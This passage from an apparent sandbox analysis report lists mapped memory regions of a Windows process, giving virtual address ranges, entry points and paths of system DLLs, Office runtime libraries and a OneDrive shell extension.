region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 2054 start_va = 0x7fef1880000 end_va = 0x7fef18cbfff entry_point = 0x7fef1880000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2055 start_va = 0x7fef1950000 end_va = 0x7fef19ecfff entry_point = 0x7fef1950000 region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 2056 start_va = 0x7fef19f0000 end_va = 0x7fef1ac6fff entry_point = 0x7fef19f0000 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 2057 start_va = 0x7fef1ad0000 end_va = 0x7fef1b00fff entry_point = 0x7fef1ad0000 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 2058 start_va = 0x7fef1b10000 end_va = 0x7fef1b64fff entry_point = 0x7fef1b10000 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 2059 start_va = 0x7fef1b70000 end_va = 0x7fef1beefff entry_point = 0x7fef1b70000 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 2060 start_va = 0x7fef1bf0000 end_va = 0x7fef1cb1fff entry_point = 0x7fef1bf0000 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 2061 start_va = 0x7fef1cc0000 end_va = 0x7fef1d13fff entry_point = 0x7fef1cc104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 2062 start_va = 0x7fef1d20000 end_va = 0x7fef28d6fff entry_point = 0x7fef1d20000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 2063 start_va = 0x7fef28e0000 end_va = 0x7fef2994fff entry_point = 0x7fef28e0000 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 2064 start_va = 0x7fef29a0000 end_va = 0x7fef29f7fff entry_point = 0x7fef29a0000 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 2065 start_va = 0x7fef2a00000 end_va = 0x7fef2a3efff entry_point = 0x7fef2a00000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 2066 start_va = 0x7fef2a40000 end_va = 0x7fef2a84fff entry_point = 0x7fef2a40000 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 2067 start_va = 0x7fef2a90000 end_va = 0x7fef2aedfff entry_point = 0x7fef2a90000 region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 2068 start_va = 0x7fef2af0000 end_va = 0x7fef2b0ffff entry_point = 0x7fef2af0000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2069 start_va = 0x7fef2b20000 end_va = 0x7fef2b2cfff entry_point = 0x7fef2b20000 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 2070 start_va = 0x7fef2d00000 end_va = 0x7fef2ebcfff entry_point = 0x7fef2d00000 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 2071 start_va = 0x7fef2ec0000 end_va = 0x7fef314afff entry_point = 0x7fef2ec0000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 2072 start_va = 0x7fef3150000 end_va = 0x7fef31c3fff entry_point = 0x7fef3150000 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 2073 start_va = 0x7fef31e0000 end_va = 0x7fef3200fff entry_point = 0x7fef31e0000 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 2074 start_va = 0x7fef3720000 end_va = 0x7fef394afff entry_point = 0x7fef3720000 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 2075 start_va = 0x7fef3970000 end_va = 0x7fef3a2cfff entry_point = 0x7fef3970000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 2076 start_va = 0x7fef3a40000 end_va = 0x7fef3a4bfff entry_point = 0x7fef3a4602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2077 start_va = 0x7fef3a60000 end_va = 0x7fef3a7efff entry_point = 0x7fef3a60000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 2078 start_va = 0x7fef3e40000 end_va = 0x7fef3e48fff entry_point = 0x7fef3e40000 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 2079 start_va = 0x7fef3e50000 end_va = 0x7fef3e67fff entry_point = 0x7fef3e50000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 2080 start_va = 0x7fef3e70000 end_va = 0x7fef3e79fff entry_point = 0x7fef3e70000 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 2081 start_va = 0x7fef3e80000 end_va = 0x7fef3ecefff entry_point = 0x7fef3e80000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2082 start_va = 0x7fef4150000 end_va = 0x7fef418afff entry_point = 0x7fef4150000 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 2083 start_va = 0x7fef41b0000 end_va = 0x7fef4220fff entry_point = 0x7fef41eecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 2084 start_va = 0x7fef4360000 end_va = 0x7fef439afff entry_point = 0x7fef4360000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 2085 start_va = 0x7fef43b0000 end_va = 0x7fef454bfff entry_point = 0x7fef43b0000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 2086 start_va = 0x7fef4b50000 end_va = 0x7fef4bcefff entry_point = 0x7fef4b50000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 2087 start_va = 0x7fef4bd0000 end_va = 0x7fef4c0afff entry_point = 0x7fef4bd0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 2088 start_va = 0x7fef4c50000 end_va = 0x7fef4c6efff entry_point = 0x7fef4c50000 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 2089 start_va = 0x7fef4c70000 end_va = 0x7fef4cd8fff entry_point = 0x7fef4c70000 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 2090 start_va = 0x7fef4ce0000 end_va = 0x7fef4ce8fff entry_point = 0x7fef4ce0000 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 2091 start_va = 0x7fef4cf0000 end_va = 0x7fef4d6bfff entry_point = 0x7fef4cf11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 2092 start_va = 0x7fef4d70000 end_va = 0x7fef5012fff entry_point = 0x7fef4d70000 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 2093 start_va = 0x7fef5020000 end_va = 0x7fef502bfff entry_point = 0x7fef5021380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 2094 start_va = 0x7fef5030000 end_va = 0x7fef5063fff entry_point = 0x7fef5031890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 2095 start_va = 0x7fef5070000 end_va = 0x7fef515dfff entry_point = 0x7fef5070000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2096 start_va = 0x7fef5160000 end_va = 0x7fef516afff entry_point = 0x7fef5160000 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 2097 start_va = 0x7fef5180000 end_va = 0x7fef5198fff entry_point = 0x7fef5180000 region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 2098 start_va = 0x7fef51a0000 end_va = 0x7fef51c7fff entry_point = 0x7fef51a0000 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 2099 start_va = 0x7fef51d0000 end_va = 0x7fef51e2fff entry_point = 0x7fef51d0000 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 2100 start_va = 0x7fef5440000 end_va = 0x7fef54c2fff entry_point = 0x7fef5440000 region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 2101 start_va = 0x7fef6010000 end_va = 0x7fef6017fff entry_point = 0x7fef6010000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 2102 start_va = 0x7fef6020000 end_va = 0x7fef609ffff entry_point = 0x7fef6024a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 2103 start_va = 0x7fef60a0000 end_va = 0x7fef60aefff entry_point = 0x7fef60a1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2104 start_va = 0x7fef60b0000 end_va = 0x7fef60bbfff entry_point = 0x7fef60b1070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 2105 start_va = 0x7fef60c0000 end_va = 0x7fef613dfff entry_point = 0x7fef60c1304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 2106 start_va = 0x7fef6140000 end_va = 0x7fef6174fff entry_point = 0x7fef614c59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 2107 start_va = 0x7fef6180000 end_va = 0x7fef69fdfff entry_point = 0x7fef6180000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 2108 start_va = 0x7fef6a00000 end_va = 0x7fef6bb8fff entry_point = 0x7fef6a00000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 2109 start_va = 0x7fef6bc0000 end_va = 0x7fef6bc2fff entry_point = 0x7fef6bc0000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 2110 start_va = 0x7fef6bd0000 end_va = 0x7fef6bd2fff entry_point = 0x7fef6bd0000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 2111 start_va = 0x7fef6be0000 end_va = 0x7fef6be2fff entry_point = 0x7fef6be0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 2112 start_va = 0x7fef6bf0000 end_va = 0x7fef6bf2fff entry_point = 0x7fef6bf0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 2113 start_va = 0x7fef6c00000 end_va = 0x7fef6c04fff entry_point = 0x7fef6c00000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 2114 start_va = 0x7fef6c10000 end_va = 0x7fef6c14fff entry_point = 0x7fef6c10000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 2115 start_va = 0x7fef6c20000 end_va = 0x7fef6c22fff entry_point = 0x7fef6c20000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 2116 start_va = 0x7fef6c30000 end_va = 0x7fef6ccdfff entry_point = 0x7fef6c79d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 2117 start_va = 0x7fef6cd0000 end_va = 0x7fef6cd3fff entry_point = 0x7fef6cd0000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 2118 start_va = 0x7fef6ce0000 end_va = 0x7fef6ce3fff entry_point = 0x7fef6ce0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 2119 start_va = 0x7fef6cf0000 end_va = 0x7fef6cf2fff entry_point = 0x7fef6cf0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 2120 start_va = 0x7fef6d00000 end_va = 0x7fef6d03fff entry_point = 0x7fef6d00000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 2121 start_va = 0x7fef6d10000 end_va = 0x7fef6d12fff entry_point = 0x7fef6d10000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 2122 start_va = 0x7fef6d20000 end_va = 0x7fef6d22fff entry_point = 0x7fef6d20000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 2123 start_va = 0x7fef6d30000 end_va = 0x7fef6d32fff entry_point = 0x7fef6d30000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 2124 start_va = 0x7fef6d40000 end_va = 0x7fef6d42fff entry_point = 0x7fef6d40000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 2125 start_va = 0x7fef6d50000 end_va = 0x7fef6d52fff entry_point = 0x7fef6d50000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 2126 start_va = 0x7fef6d60000 end_va = 0x7fef6e51fff entry_point = 0x7fef6d60000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2127 start_va = 0x7fef6e60000 end_va = 0x7fef6e63fff entry_point = 0x7fef6e60000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 2128 start_va = 0x7fef6e70000 end_va = 0x7fef6e86fff entry_point = 0x7fef6e7c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 2129 start_va = 0x7fef6e90000 end_va = 0x7fef70a3fff entry_point = 0x7fef6e91000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 2130 start_va = 0x7fef70b0000 end_va = 0x7fef70b2fff entry_point = 0x7fef70b0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2131 start_va = 0x7fef70c0000 end_va = 0x7fef7340fff entry_point = 0x7fef70e9410 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6917.0607\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\onedrive\\17.3.6917.0607\\amd64\\filesyncshell64.dll") Region: id = 2132 start_va = 0x7fef7350000 end_va = 0x7fef73a6fff entry_point = 0x7fef7351118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2133 start_va = 0x7fef75c0000 end_va = 0x7fef7789fff entry_point = 0x7fef75c0000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 2134 start_va = 0x7fef77a0000 end_va = 0x7fef7813fff entry_point = 0x7fef77a66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2135 start_va = 0x7fef8e10000 end_va = 0x7fef9125fff entry_point = 0x7fef8e13e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 2136 start_va = 0x7fefa520000 end_va = 0x7fefa5d9fff entry_point = 0x7fefa520000 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 2137 start_va = 0x7fefa7b0000 end_va = 0x7fefa7e8fff entry_point = 0x7fefa7b0000 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 2138 start_va = 0x7fefa7f0000 end_va = 0x7fefa80ffff entry_point = 0x7fefa7f0000 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 2139 start_va = 0x7fefa810000 end_va = 0x7fefa8d5fff entry_point = 0x7fefa810000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 2140 start_va = 0x7fefab80000 end_va = 0x7fefab97fff entry_point = 0x7fefab81bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2141 start_va = 0x7fefaba0000 end_va = 0x7fefabb0fff entry_point = 0x7fefaba16ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2142 start_va = 0x7fefad20000 end_va = 0x7fefad2afff entry_point = 0x7fefad21198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2143 start_va = 0x7fefad30000 end_va = 0x7fefad56fff entry_point = 0x7fefad398bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2144 start_va = 0x7fefada0000 end_va = 0x7fefae06fff entry_point = 0x7fefadb6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2145 start_va = 0x7fefae10000 end_va = 0x7fefae1afff entry_point = 0x7fefae14f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2146 start_va = 0x7fefae40000 end_va = 0x7fefae58fff entry_point = 0x7fefae40000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2147 start_va = 0x7fefaea0000 end_va = 0x7fefaeb4fff entry_point = 0x7fefaea60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2148 start_va = 0x7fefafd0000 end_va = 0x7fefb0f6fff entry_point = 0x7fefafd0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2149 start_va = 0x7fefb200000 end_va = 0x7fefb208fff entry_point = 0x7fefb200000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2150 start_va = 0x7fefb210000 end_va = 0x7fefb23bfff entry_point = 0x7fefb2115c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2151 start_va = 0x7fefb2f0000 end_va = 0x7fefb303fff entry_point = 0x7fefb2f0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2152 start_va = 0x7fefb310000 end_va = 0x7fefb324fff entry_point = 0x7fefb310000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2153 start_va = 0x7fefb330000 end_va = 0x7fefb33bfff entry_point = 0x7fefb330000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2154 start_va = 0x7fefb360000 end_va = 0x7fefb366fff entry_point = 0x7fefb360000 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 2155 start_va = 0x7fefb370000 end_va = 0x7fefb37ffff entry_point = 0x7fefb370000 region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 2156 start_va = 0x7fefb380000 end_va = 0x7fefb38afff entry_point = 0x7fefb380000 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 2157 start_va = 0x7fefb390000 end_va = 0x7fefb3a5fff entry_point = 0x7fefb390000 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 2158 start_va = 0x7fefb3b0000 end_va = 0x7fefb3f2fff entry_point = 0x7fefb3b0000 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 2159 start_va = 0x7fefb470000 end_va = 0x7fefb480fff entry_point = 0x7fefb471070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2160 start_va = 0x7fefb4a0000 end_va = 0x7fefb5c9fff entry_point = 0x7fefb4a3810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 2161 start_va = 0x7fefb5d0000 end_va = 0x7fefb604fff entry_point = 0x7fefb5d1064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2162 start_va = 